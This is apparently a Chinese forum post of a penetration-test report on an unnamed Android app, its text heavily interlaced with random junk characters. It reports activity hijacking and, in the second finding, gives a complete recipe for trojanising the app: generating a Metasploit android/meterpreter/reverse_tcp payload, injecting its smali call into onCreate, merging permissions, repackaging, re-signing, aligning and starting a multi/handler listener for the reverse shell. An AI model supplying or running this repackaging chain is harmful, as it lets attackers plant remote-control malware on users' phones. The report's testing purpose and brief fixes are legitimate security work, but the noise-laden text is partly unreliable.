" i9 v% ?* D: j2 I# L: E 8 y% q3 j9 B/ K0 H% m# O: k2 w   ' b8 @4 G4 Z/ b) g% n9 k& t8 ?( [2 s- O$ r# h4 E) F$ e/ j+ v7 q

+ B6 ^" _: @/ I4 B( f3 J9 Z" g" D . P, J+ K+ m& k9 [; \

; }8 ?* X" \6 }$ g 9 |' y3 k6 b! K2 a& f 1-2 测试结果 ) R0 J+ A! ?) C) j' f) U+ X : J. [ N% c. b& d6 j0 L9 V" _; i0 d' U" d

/ D3 a7 P) U; g8 V5 ]3 s+ j# I7 n' t, j2 ]5 i- \

M+ b$ G+ ] c0 w ! C7 f# |6 O2 c) N6 s   6 i5 }, B5 p( \7 G* f 0 r# q( j) \: m! S0 E. D+ z) r3 ^

" G9 C! H( J6 ] ; O, j0 R3 f! T: J$ H: @

+ Y8 J3 k$ u2 D, K' Z- I* l ) H P4 U+ k, l1 Q& M, s3 N 2 检测结果                    # |; j! H) N2 Y; [ ) k" ?$ I4 t1 D( q+ A1 Z. F1 N

; D: O( ?0 ^9 k! [% i, q1 q$ ^; W: }' G

, n% Q \/ j7 @' |9 E' A $ X. d. Y9 }) ` 2.1 某某某 $ w e6 M5 R Y0 a + F- T2 k) t* K1 r

2 \9 z9 ~; W( @/ m9 k. a3 R % F+ A; ^. c4 Q) t$ M

/ e2 T1 m" c$ [! {7 v 4 P) ~3 b0 y1 k; w; _0 _/ n 2.1.1检测目标 % L5 f" v t6 K6 x6 B: c# L) M+ t; y" _$ c7 m4 V8 N d! H

+ h' J- k1 K3 r( Q7 ~) V$ G: ^ D6 [! R

& h" _1 N0 i2 Y2 P9 m4 R% J 4 p: S) x$ o) F) X1 \ 目标地址: 某某某某某某APP : Q" L% K* o: y' H9 a' h/ P6 o( ^& D' D7 ]

O/ [7 r- `- s ) T* w$ w* j3 c% ]) e6 U

! e, W8 x7 e0 L5 l+ u$ |3 F* s2 L$ O/ S' U6 z0 ?7 F2 m 2.1.2检测结果 6 M# C) C2 b% Q3 u a 3 r: E% z6 Y- ` o9 F, Z

$ T. H+ [7 z8 @ ^4 X # k9 V$ F# D7 Q6 y

/ w. k' m( H7 X; m5 d) ~5 e+ U ! h4 T5 D K k9 \ x u( [, C# c 2.1.2.1 " w7 {# B% G* c8 q 5 a$ F& W4 ~% s+ f8 [! ^" t( f

: Q) v; g( ^# n: ~. Z7 V5 S) ~ 9 ?. D( l8 Q; R# G

, H; v$ R; s# k: i : c1 e3 e( R. h 漏洞链接地址:某某某某某某APP - y% C! k4 u1 t" R# b; h) f , i$ c" G/ Q2 u) N- s

& q$ r, N8 ~' ?) Z5 i) f0 Q2 X$ V! D9 H: a8 O' n0 Y: ^

+ D) o. \ C0 y6 t+ j* ^+ f& l- d. f) g/ ^2 c5 l- O5 B& }, u   8 I) F% v+ ^# G 9 }4 o* U4 Y6 W0 d$ j2 k7 L8 A4 P

" A& U' x, o% F1 s5 |" V* p # |8 I; I) d7 @

) |4 I/ {, k$ W& e0 x5 o3 Q- P 8 J. Y7 T; R6 T 漏洞分析及取证: % \: @, s6 E+ B& V+ y 7 V' P" A' j# }: o! {% l8 Y

9 V! C; ^+ i1 \) k; P' ~& D9 X Z& _: l t, s& d

/ L# E7 ~' ~3 r2 O, D 6 R6 }, |1 z$ l                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 5 i! `$ \) e7 v, G# z 1 Z* U& f/ L9 K0 l! b

( M3 Q! Q* L: {% X( ~4 n ) t/ a! ]' S+ b8 u2 ?; A# Z

k: @( E- ^ N5 e$ o! \0 p( i E6 H# @) s- i( S+ Z; `% h8 i      * @; z0 Z9 k* }' Y9 \8 J, O2 g0 ]$ Q# E& W; [

6 A# h }% `$ A5 K: S+ } b# h + |# K% p1 n9 D# _" w1 B

7 h, D/ G1 W2 ?7 W) r8 i4 b' q, c9 Y% K/ V/ L7 W8 H4 _                       9 r7 Q2 s8 z; p5 o3 P- {& B5 b0 |: v" I' t/ V8 N1 {' P

% e6 B3 P" j4 e+ W1 B7 z/ ? V& V& s, E! O) q: m

* J! _4 q9 E7 b0 f' ? " G; {+ b- e B& j( w * f! H( ?* j! d# Z0 U3 l 5 E3 |2 K5 q, T. i W% @) @

: m6 X0 v( `5 S2 `2 Y8 k2 V6 o6 ]. X5 g* G% m$ `4 P5 S! `

5 r3 D8 n" o- y4 t* ` T" b& Y5 q% f4 `% Q' f2 c; h3 W( P9 G ' { q' |, J1 K4 r9 a" x% S4 y. ]# a2 L w+ q! T2 E7 V

1 E) R0 [3 }8 Y6 @, _ ) E- S+ i5 s3 t! X" {% ^2 V

- l( f: C: j0 K7 e6 I3 M8 b ? X8 ]2 q! ] , }. u+ j& }# ~; z5 B7 Z/ E, m3 l3 \7 ~2 i; M$ {

: [% j1 T- K. }% `7 p. Y* c 7 ?9 u8 q2 p; h( b# G8 ~

( c3 h* y* ]7 A0 r% ]- o* i & G: S' i0 x' `1 P* L 漏洞危害:高 ! ~8 `2 m7 }6 S& _& R6 h9 f% V0 s' m+ K6 W( k

" }- t& c: _) A 4 V3 n4 e+ y, N" m6 @8 L
; }6 b6 u& Y6 ^ A) ^ R6 L9 ^, z: W0 [* p- ~* K( g+ ~! S" T / g* h- v: @/ V9 [0 n5 ], K. c d$ {1 x/ N, F3 K. t$ K2 U2 m( q0 V' m7 U" m; q" _5 v' \/ Q, \$ k0 R( S7 u5 X$ {% ^9 {8 m! o, w* K3 Y4 o: h$ x5 V, n5 p) A( E& o) G. e$ c7 ?! {' O" [6 q- W6 l3 Z" t* j( H! N o7 B$ {5 z# \% N# n9 \4 N1 {" j e% `# @; v1 n9 [; D. h8 O. E) p$ b3 o6 j- y$ Z9 t( e" S2 Q- U4 r+ }6 {& `7 l2 O b8 t/ l, K0 }$ [4 } s# U, M$ }0 _- Z1 `% C7 G7 x3 H# ]& v2 @. `: v9 Z+ I! I0 t" t4 W7 G( i* Q z. A* ]* _% g5 V- Y# @7 w# e: J1 ^" g6 L! C) U+ W. l; R- C) J5 B( s0 Y) x# R% ^) f, c" {3 O0 b& j v- T' P% L: A" z N) R. A: I% Q9 l
^8 e. v) K4 c* C ; C5 {5 H5 P+ k S: U# S4 y# o' Q; n

$ x! w2 j- C& s4 J# k: } 4 X1 G8 \' Z/ `) c2 X 严重程度 * w Z ]+ R( |& B& s. i ! u& N3 S3 {) g, n q

1 `% P, D7 h8 y& B! E F # x$ n$ V9 R0 V# `: p* z
: J' V' b5 b& x6 z( n9 Q. v* C2 L- E$ n; u5 W' [

. R8 f- @. {+ x. z# q* O5 R ) P) Q4 { \, b9 _" q , l, C% S* |5 z/ @3 J' U' ~ $ M5 H3 \) c& H' m( [

: I& y1 g3 |, D& Q$ _" ~8 X; C% T. s6 N5 c8 b; i
+ [, r2 W* c( X4 E 1 {2 E1 b* V4 v+ E$ P

$ b3 S, |; `, Q6 ?$ _# ]2 [; _) }+ k- T t, A) Y. W : N; Z _ x0 \- P' F1 X. ~ J ; k- c3 |" t5 Y8 [

1 K2 L5 f/ H# `) _5 c6 G: j# L1 r" H" t
/ U3 Z7 o" t" o 9 D7 Z5 P9 |! |& A

# j0 e; S6 h. t) ~* I4 Y ) R7 m% l' s" K. V! q4 V+ g' U E/ q5 K1 l9 j, q0 c1 g - B$ U6 X ]# a' {( O: f/ g

! w* r6 i' z: Y" i- m1 L. w " r) c* ]2 O- b5 K
4 w* _; L2 H3 g! A& k/ K1 T ( g, g: B' [2 o2 \8 @! J$ \

% a! S3 s1 g5 }! Y" E1 H Q8 ?9 [. V * K; c2 }5 \: d/ o   9 d3 P9 r0 E V- K- M0 n |9 M, n Y3 p+ @; p5 F5 K3 [

8 g+ A/ r) {* y" N' Q) m 7 R/ Y+ h3 d3 J- n, P, X
9 P2 N1 d) g+ v2 Q3 @. K4 ~ + T$ R. i! I- {! m3 n

. _) Z0 o; R: M$ z + O8 t# Z$ `+ f7 \% i+ y& G # c, q2 D( Z6 |7 A0 R * f% u7 L- L) ?) n. C, q& R

, _7 f' Y4 p7 L & B" E A5 x* {; F# T; Z8 n( h
$ G6 u* I8 M, |) o, \ ; p0 `0 I' {8 H5 N6 @' f

+ Q$ p6 z1 ?6 ^ 9 g. r# f' ?$ ^3 _   1 i% l! i. r' u7 h, v 7 N6 h7 T& G; l2 e/ t% f

, ^1 w Y. R: B: X' e6 v( i: c2 u. W0 i+ A- {% ~$ }
* l, N1 @: f' E, ]# p / I- o. S& o, q3 G9 f9 T5 N+ L2 p/ ^
( R% o/ a; z, u7 D$ {3 m& ] ! L* |- o7 a& G0 f0 `

! r \. ]# Y% n; y! U! O $ ~. M4 v8 D4 D5 l# Y   / j7 Z% |, o3 e* [ . c% H2 K V+ Z, `' y$ g5 ` M

$ {8 [% T [, c' w% `0 c ) p5 p3 e! i2 {( p$ ?2 E

4 P: q5 T, d9 W1 {4 R) R 8 l; @ P$ a! q$ Y! y 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 * x5 z/ O3 J9 U0 p! [2 i, ~, W 3 K" T( A& M5 D; N- v

- t$ x) q# L) \# V* V5 Y3 \ 2 K) }; H' g3 B# R. j% V; ~

5 G ^& A l4 d . ~) w# s! U U e           ( _( [6 s" }2 O 0 E" F4 R8 m$ _1 s& }* B4 M* }: b

! [0 j( F% _; d3 N% J: W: j' J1 W! v @

2 t/ K- _( _5 S0 k2 }( I& ?, m$ x) p& Z9 x( |5 _   , O* X4 r1 E5 J/ m; G( w9 y8 c: J& r5 \: d; U$ S: @. p. \

0 ?' v1 Z7 h4 i3 i( Y0 A 9 |7 X. r9 `9 T# P

8 X3 L6 r6 Y: S& ?3 l" Q: e5 M- [0 p+ l( Z! o 2.1.2.2 & ^( t1 ]' {9 o' T* z8 W / ?) V% T, @5 p4 m

" k& {5 e9 v g* X: j1 d 3 J; n( p3 v: \! z$ L: o

1 J3 N; {4 Y" `- V - x8 t2 y9 m7 j3 d- C 漏洞链接地址:某某某某某某APP ( H8 ]7 W I7 A5 I+ ^/ l* O8 [' w" {

* z( C w- a& ^* v9 t2 R # Z2 E! n% w' P' ]4 T+ s

/ V) |& x, r) @, `4 M9 E Z 9 l: O0 {. O* E$ l6 [' u1 q 漏洞分析及取证: ?7 t+ r8 J+ I. `+ s7 P ; b' V5 }3 p7 g% L$ Y

( [$ p" }6 v0 Q* k1 l0 O 6 F7 P% ~$ Y- e7 S7 S$ ?

/ w/ m) h/ W- Q3 K/ W + V& t h+ x* M- p9 g# J                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 5 R/ p6 j2 O' ~ o1 A 2 N- ~) _+ h- @9 E

- l/ ?5 ?& X9 J2 U" C5 b 1 x2 D8 Z( o" n/ Y

' z+ l; g! t! f" } 1 S3 W- `7 g+ d5 F8 l# n/ d$ W1 E Metasploit 生成木马 apk ; [- f: q5 ~+ ~% J: B! Q" Z* C3 ? q

1 A% x _/ X2 p' q l# f& _! O 5 H8 y5 f' b% a- F* F

- z |4 m1 \/ ~7 U% z; Z3 @4 W& L " W. c! G3 z) g" g3 W% G, _ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ `; D: o+ w; u4 M8 f2 ?- t + G7 U+ k. n2 l

. C8 q# { G6 x# J2 q& m. g ! M* S8 Y% J ^; Z+ l z! F/ E. U

" E$ q: ^2 l* P( P* r# s7 S, p6 l( e( [1 h1 ^+ S8 P 反编译目标apk和木马apk 7 C/ b3 V6 M6 f8 d: F5 a / E; {7 q1 d# k3 h+ Y! r

! B6 \4 ?8 X! m% O, _7 z. ~: Y 7 F" \8 P4 r; \2 k1 \9 O: q$ ?

5 }% F5 Z1 |, l1 V, K6 D% Q$ A- [0 o# U2 t1 Y( r+ t& r apktool d target.apk
& O ^* d; v. }# x* l5 T 4 F& i) A) C9 T/ q apktool d cockhorse.apk
. `. P9 h! Z, W/ K$ C F ^3 i# w+ Q# u

9 v P0 `' x. q3 {; w2 Y0 F+ B . t4 f! t6 V$ B1 h$ _) E+ i1 r: Z) j

1 x! l: ~, c# Y" i 8 N: j. L! @1 A' L: j1 X7 _ 木马 apk 注入目标 apk . d& s& Y" L1 \1 V' h7 | , D& `6 p; y- T, c

: S; y: [" ?6 O; T- K, N& n z/ o 2 H. @! g7 ?1 N- l2 d5 ?! N

2 v8 s# ]: W4 B+ d9 V+ V1 l3 B, {- ?' e4 \- i% }- ?. S8 R 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
. P, i1 x" e: K0 K7 V; n$ q, Q( A5 q4 H k8 `2 i# J+ h# M invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
& A n4 P( l1 k' H 9 u- C$ e% D- f! J: X- m/ f

$ n, u* M# `# C) j1 u7 v8 E9 P: |$ m5 e & }7 D8 ]8 H& v# c& {. m

2 ~8 l# i4 o+ i; z & @( T6 y5 _ l0 { 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 E+ Y$ \( P: s. r4 ~4 w, z/ x : n h) I! D, N6 P! V

" y6 J9 A% q% g* U" O1 S : r% y! P( L4 _/ }5 M4 W9 i+ a

, H4 D x6 i- z6 o J0 N Q 6 R/ Q; J& R1 J. b3 P2 L- A 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 8 |8 G5 f2 ~, l2 D! A1 z$ ` / @2 B# j0 h/ _! Q k% ^

4 x3 a( Z" E! E5 M8 I , p w, C6 [7 \8 t7 U+ C

, ]) M) f' u2 H4 ^- ^8 p& o6 M 3 |" Y+ E* J p8 t; P# |6 x6 z- I 回编译生成最终 apk 4 {% n, J$ V9 X" D , P" K- f6 A# e4 H6 Y6 v# n& c

5 [/ I- Q; y! `! Z/ `2 ^! ]# c+ n; _, ?6 r" B7 O3 S, z5 E: k9 Q

2 E" A H; `" [4 K! U2 }! c8 v, _ * f! F) a5 E+ O6 y) e( H- N 重新打包 # \+ h- [2 X# S$ F+ _# ~ : W2 F1 H; ^( `$ i& X6 Z

/ W" N) m$ }8 X$ i" i S1 i - K5 n5 T( g8 t

( ~2 k# E. z! v d) ` 2 m) ` D: ^. n9 V1 V3 D, W" o+ B apktool b -o repackage.apk target_app_floder 7 B' T, F+ a2 h# @" _/ J # M' \% g* m5 E+ g

" n; `4 R3 q" J9 K6 e( ?/ K) m1 Q6 Z' T1 o$ A, t& O; x

, @% E9 f2 P) J- u! d E( N! u5 v( X" j b8 W B 创建签名文件,有的话可忽略此步骤 3 y, d+ w& A' y3 Q4 n6 @7 ? ! y S! H0 H& `7 D: F

9 _% w" t8 \) R4 K: D6 Z: g8 b 1 J1 |2 P* w, d9 g6 |2 V

7 j" @0 {6 J% q. i & }1 Z. u$ t( d keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                6 u4 I, x3 I5 z9 t5 L6 D4 o9 b ! V, e" r% x) i- q4 Z0 u" `4 J

- R# ], R! z2 ~+ f! y ( [ h3 Z8 e$ H0 K! f" x+ K

; B; [. G, x# U4 i * E0 h+ I7 @' d9 B* L2 N 签名,以下任选其一 ' W3 Z. Q* E: J. g 8 U- F) ^ k" O3 W- T& q

7 U" D9 |' ?% k% _# U( T' m8 T: P ' |) s& i2 G+ y* e3 o

; d' ^7 L7 x& t' ^ / v$ N& `" [' ?0 k, V* V8 T6 E& ] jarsigner 方式 $ g. `; x3 @ H5 b b8 @" W/ H( l! ^

5 h# n# E/ B6 ]$ _ ( e2 ^. a- O, D* b1 Q

. Y) t8 K# F5 Y! n9 F! s/ S0 { ?+ w 6 {4 \8 h1 l M8 g1 u6 R7 q/ \ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 b9 `, R4 }$ p( u8 R+ I 2 ]) P, |: I! R4 g/ y' j( X$ J0 P- d- |

5 g6 M, @' f6 E8 c$ P' v6 q: P * s$ o$ n$ Y9 z# t, h$ \# ]

, l% L1 |& p6 e" [5 ` * H [5 I" ^( t. _+ l apksigner 方式 ( m* s9 T' y! [ 0 t9 w. w% m9 ~8 b1 J! Q

9 i# I2 W' [# G! d & j, \. G9 x. E2 E& H# Z

7 I; R/ `' B& X d" H" L J & @0 L; Z7 D, [6 l apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk : |0 J$ N! \, k3 J7 Y0 p& W4 D6 g0 r2 ~% N5 |1 |2 q' T8 c

( g2 v5 q$ s& s1 e' p & h4 o- U4 ~1 ?

& Q: @- q6 J2 H2 o8 c% d. D2 }$ r8 r( o 4 v# P6 e G. i4 R4 L7 ^ _ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 `1 J% I, g! Z9 b3 [ - {7 J- u; G' Z X

3 o3 g3 P) @- v F* K+ @9 {; v) k9 f6 J

1 J. W/ I9 [2 C2 o1 A! \3 B# o 5 a( n$ o- z. d- e- i4 A 验证,以下任选其一 L5 q0 w: Z1 B/ h* [# M" q' [! O# |2 N" f

g& ~+ Y6 A$ F' O! c( }% |4 w# Y0 v3 t0 x9 R. D7 h$ h

2 J; _0 p/ T% P, x! _& `' T" u1 }/ {3 i1 m! w/ A( v1 S jarsigner方式 8 A' c3 Q& D- ?) u1 c- `8 K) z ' l' {& V8 T4 P, N+ {

4 z. \/ g: n! R7 x6 F; d' x4 {# D) N! i

4 c7 k5 A3 J4 N w/ N D6 I a: h6 C7 a" K( s4 l jarsigner -verify repackaged.apk 9 x4 i& i' I4 u) ^ $ S p! W% U! A3 d

8 G8 W7 @+ b4 K: }( } ) s- a( X7 n" t1 C8 \

8 \, o" N, j \( T1 K! J/ T ) i) [1 z# I* }9 [+ b# u; p apksigner 方式 2 ^9 w' E' s# H8 t _4 b6 m: W / x% k' q+ g& a- k

# b# A: C D0 i' q 5 z Q/ \7 H$ ^& ]" [

4 W: m4 y' A4 u( f I! f ]% k/ p 8 c0 ]& q" h \ apksigner verify -v --print-certs repackaged.apk ) }3 E" ]7 I' u+ V) G- z; ] ~ & b& L8 I9 u5 l7 _/ r

4 ?# B, @/ {4 h9 F * ?' R2 }/ Y p' k$ N; _

( @( m; M1 A- b7 m+ n 9 A. l4 L$ }, U# J* {6 L4 { O8 i keytool方式 * F% {1 W/ Y U: x1 c Q/ ^; [ 1 w O# r( V1 i+ f) w

6 W J% E) @/ A 4 E8 }4 ^4 o. {$ V" q9 s

2 l& ^. r! _& P# k) w5 B+ o4 u/ M ; V' L3 @ u4 i; ?' l& s! z keytool -printcert -jarfile repackaged.apk - D( _, v3 {" k8 k 7 ]6 N0 F4 k; K+ d6 V

7 E; i" r3 c; R" ]& S 5 ` c' a( G. H# [) ~" L/ H

7 Q, V# n* m# N0 Z; s 2 i6 h7 w5 {" k 对齐 5 _- v" E Z8 F5 Z k- s" _1 Y" H/ P9 f* X5 o# Z: b. o

3 l+ B4 l( u8 o4 h+ M* c7 x& K' ?) u

; ^" f7 {" v% _1 `7 M 1 U7 N( s& c+ f 字节对齐优化 6 n/ S9 O, X3 H" E. q0 X; Q* F ! V6 L# _: c" k! G6 Z

) n% [/ c, s5 E8 ?& x' z2 Q, t

# n' m) G# J3 g$ N9 j O$ |+ `& e/ }+ e zipalign -v 4 repackaged.apk final.apk " Q. p' Q- o3 q$ |/ @& G( s) x 4 [2 ^& R }+ F, J

' j4 H4 k1 l; ^' s% P+ w% Q+ p' i# t" G) K2 |) \6 `; I2 b

* H% @6 @% r! j$ Z9 U2 q+ f" ~! S( B . i& {+ s+ @0 P. ?# {; [9 c 检查是否对齐 8 C. O# E: k' {1 X6 |- _2 | - z* R; W( |7 \8 p

) }4 m% t+ R" x$ F& j$ j% e! Z9 z5 ]+ P9 a! T$ w6 n

0 B4 O+ Y, R8 a) x* e/ X+ E6 I( h5 Q* p* h2 g# a( f" u zipalign -c -v 4 final.apk * v) J& u$ }7 S8 Z7 ]4 b4 y; c; c! \7 ~% O4 C

0 f; c0 T. m* z& l* N/ R, x- ` v4 ?+ X! t' F9 d8 a8 q" q

3 k3 b) e* R& c; `) P 2 B- y- f r$ @8 ?4 J: l! J 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 # `7 }0 V: r1 F# z4 ?: F0 S' r' `) e/ h4 U

6 D9 Z" @8 N9 X& v3 @+ ?, Z ' V# g: F: t! z" R! X7 j

# \4 x/ U0 ~6 h ! z- \1 M0 f, K* \% h 启动Metasploit控制台,配置参数等待上线 . O" B! U; e1 W, a9 V7 P , U' e$ `8 P+ y8 M% o* \2 o

6 W9 B- }$ T3 {8 Q' d1 Q6 A $ G+ Z) P2 s* n, o$ h) U

/ i6 q1 _3 B4 R( \0 T1 T 2 R5 o+ @* {; ^7 `: `2 Y$ H( | 在终端依次输入如下命令 $ P2 E/ b0 f/ T0 V3 r8 }; ^, d: C3 b3 r

3 }- n5 `9 A! N1 Q# H ( Z* ]- K! q9 u, b# ]7 u

. G; K; \( [$ H l, Q 6 Z: d2 ~2 ~* V# Q4 O# s& e msfconsole - M7 K, [1 |6 [3 M, E9 Y1 I1 { ; K% J6 D( w; E: B! a$ @- S2 e2 m; c

) _, U v; y* e- K) }, y; P - t/ O% v2 b8 Y' j& i7 w/ p) |/ H6 ~

/ O9 c( {( i9 W6 D9 x ] ) x6 }, o3 s% h1 u4 w2 V use exploit/multi/handler . L' s2 I) P- c, H6 F9 s0 m * K6 L. ]) ^# }" a

5 e$ y4 h: S' _" m4 Y# g7 Q1 o % l4 c9 f6 E7 J# v

; u/ j; I$ R$ Y: z; y- O - w2 Y) i3 |( [4 f* U$ E set PAYLOAD android/meterpreter/reverse_tcp ) Y& K% n, p4 M9 E' O6 Q; J , y, ?& G c8 N+ x* _; f, K

+ k3 i+ t) g- q g9 ] % i6 J: E! ~6 P. X

" V, @( i; I8 @; E% u1 S* V1 D T4 R set LHOST 192.xxx.xx.xx , |4 v+ q- C* m) x, V% c# T 3 r5 k" f: ~/ D+ h2 W1 f

+ n% s6 e6 g2 {9 J " {; V/ v% \. z; s

7 V( R& c4 y' d0 y- c1 T4 S/ a- N 6 B0 ^+ Z. ?7 p+ {6 P set LPORT 4444 q) M! `$ y3 j ' T0 \" _4 i6 K j. h/ p7 f) C2 S8 Z

, }/ O0 L7 F8 x; q- ] , Y" N6 [) m. c4 Z

7 r$ p6 y% h3 p8 P4 w( I9 J: Y6 V/ U0 ^! s exploit * q+ A( L u3 z ' m8 U ^& y8 M6 b. F" v

: Y8 `. P3 F& k5 B) ]' U! [' F5 S 7 J6 b& U+ V4 h0 `7 v- x* ?! c k1 c

n; E1 K, v, J1 d / \: {8 u; G1 r4 D. o9 o8 i! h 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               " V0 K3 x7 O; n4 I/ F/ G' F 9 g5 V! n& w2 @

+ l1 i0 e3 q* S" I& S* O# r # Y: p; n! G; ~0 K

* m/ C' F( u. X4 a5 P9 \ ! w' n6 L6 P! e8 ~0 b/ E$ |* q. C9 H 漏洞危害:中 . A5 a( b9 w& e! f+ f+ ?9 M + y. Q+ f% A9 Z. R% n- X

8 c3 ?) o- N5 n2 }4 F& s- o) R$ I. N1 g: p* C
* k9 D0 l* h1 ]6 a! _ ' r2 ^# u/ R3 w) L $ i7 z! S4 q" F* M3 H; P9 I: y 7 f% h6 u( [# ?- W ( y" G, V0 ?4 T( ?4 Z6 k0 r8 |8 t j9 [) }; W3 |( Q0 q1 @; Z) P% p& z" ?+ f9 `5 H9 K: s& [5 r7 l# N: w7 \) u5 E4 M: a) h7 W' v+ ?# J$ m5 E6 x" T# [. e+ n8 B! g! O& C- F1 ~* Y# f: C4 t% k) p' [- e! ~" g' l; k+ l& v( k5 I8 X4 S' L3 n" e9 V3 q7 l3 m" W, c; C+ T8 ?: g& y8 `& C, \) ^7 B! I; l* v: S" [' q) Q/ M F, S9 w* Y. T$ c* I* Z" o d0 W! h4 X% m% g6 _6 \; l$ @% X" R& y% r' M6 h2 F# x, e2 m2 @0 @, b* F' ^# l J% K. D& I% Q3 z$ W3 Z6 r8 D5 ?' U/ Y6 L$ V1 f. f5 e! D8 r% I4 ] x8 q. p% H( Z, a* d) T7 ~6 ^- Z6 w& n4 v" n# T! F/ C! x* A* D* ^4 H, W# Z8 M0 ^! h
1 v" G. r- D5 f' a6 _2 C* X" Z , ]+ C, N! V& W1 [

5 {3 R& n8 Z) ^! q! A0 l# M+ z) O 5 t; c4 M- k# H; j 严重程度 - C2 X/ t* D+ x/ J % @4 P( n' {; P1 j: L4 ]8 T

: p, I0 R/ K* w& q : G3 r1 t% R' C+ b+ ^4 i) r1 ~
# P4 _' \& y( \) u2 M( N% O& G6 v0 r' A0 ~

6 m4 X8 ]6 X- ^; a2 l) l2 p3 A C : |/ G+ V' Z# O8 n: Y" { & |( y$ w4 Z2 t( ?/ f( C, k - Q6 b2 I" Z$ B! U+ `# n( Z

( D {5 w$ e; ?1 R & l9 L; ^2 o" i5 Z- ~
6 Q7 `( n2 _# V9 c1 m! N5 p+ e6 H U 5 x2 t, `. [' Q5 ~% `) A

F2 ~3 F' k! P . U3 d, _" [( g0 \ 3 s S) C- R9 m( N 0 e1 v& |+ m) q" g; G- V4 z2 e* G0 l7 b

8 R' X9 h" i, K+ p" q: D7 | : a4 r) J8 E( Y6 n) Y5 h8 j
" b* F; ]; v- {/ [$ \3 i 6 r! E# P! M9 D0 I; g7 `/ y

L6 o5 F1 g' f9 _ % A8 W8 ?- }8 o" b+ C) e2 J , A" U' x1 Y5 n4 q1 Z) o 8 }* @: Z0 J% D. ]1 v

! l4 J" {$ C% k! i4 _+ } 3 E; e0 _4 [! y" ~) O: n' e
' J. ` N; O1 x& U- r6 S: d: Y G % G8 N; G. l" l. I* M/ d : r6 X% B v2 s+ y9 t. b- I9 ^" v/ V1 i I B

/ ~7 H9 k A# d2 X W* s0 \5 j: y; x+ h' r   ( Y0 i' o1 n) j; {! Y' c 9 j( l0 o: e+ P( M3 i0 _4 c

, ~$ e' x" j( a1 o# ?3 s+ _1 c6 | ; j# a( F o4 X8 S/ H
" s' N( D. @3 R9 e 3 }1 u/ g) b8 K4 \

0 g j! Z4 ]8 R+ l& s) R% y8 O* a% J6 i: S$ z. d' J* b 5 Y% J6 I( T' |, ^1 N6 v m( G( c* k$ T; ?5 g" Z1 A7 Z4 ]/ O

; B7 D$ G' r. p' a $ H( ]% G1 u9 P$ k' i
8 {" m& b' |" L( `5 W. g 7 a. n) l* W; O7 a0 X( s * s/ I4 S6 x! L" `8 I6 n; Q $ m$ F" ^& k% e/ ^) B: K# y

9 Y7 F6 ^# z0 o. y# J 4 T8 ^9 _! _6 {, W! s   h; C8 p" q+ z, g8 s! Z' @1 g 4 z+ d0 @: \- _" U# q1 d- p

) ~# J" e5 M0 _* ] . Z- \- j6 A! W0 D+ W5 @" `: f) k
( J# @- }0 k9 |2 f% m9 s. {4 F : x" L7 c/ W1 f( x/ _) C
) |& l1 }3 x. ?; e, T7 Y, ` 1 B# p6 Z* X" Q& j7 D- d) U" I4 H* E

* V& u8 M9 M# i F( e+ N7 g1 D0 t! [: K G   5 i, @$ s/ A5 ^ / T8 Z, W0 ?8 ^$ U2 P# N

) T5 |$ B5 T; l; M/ i) j) k% N* Z& F 4 @9 O# }+ L6 V' M# Z

; _' b' H0 }$ y7 L 3 E; V/ S# k% r; q6 w7 g 修复方法: 5 c! D/ x3 m* _: x; e6 n: b. t2 k! v

* ?1 a: w b5 H' t( I, H7 b- O' ]8 u# l; a! u& e

2 C; q' U1 A9 g $ M( [: ]3 a1 r' Q               1. APP 启动时应做签名校验防止二次打包。
- k4 a% l6 v W5 a. i # D5 C2 D6 M! p9 l# ~* k 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / e0 G& c. M, f; q- W. Q+ Y0 Q/ o! ?, M5 t

h7 s, d; v* [9 Q$ Q8 S . q' T; M) l2 t $ R8 I' U! w+ g( T8 B 6 l. |6 g4 U: w( b0 n8 U

5 P) W" ?2 _! A) U& f( `8 N - y# x% v: T) G8 @; X   : X: X8 y3 h3 F/ O: C; y6 { - N0 Z' {* A9 _# K: j

- b) n* S! s6 c* k6 |4 G4 P9 m6 I: O% ~ ) T; z O' K# A& K % |" Z5 X( X) J3 b3 _ " w, W# X& h N. N3 }) T+ y" P

' f3 @' e- F! o. Y" b7 H4 W3 Q ! w" e: a0 E2 z" J. t
, X* r4 ^; {% U8 F) M4 d! x, P9 P& u+ }* G% n

+ B9 V* g1 B4 L. k) O5 u( ?1 ?, Y& r$ F) S4 }$ Q4 U* i" \; u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表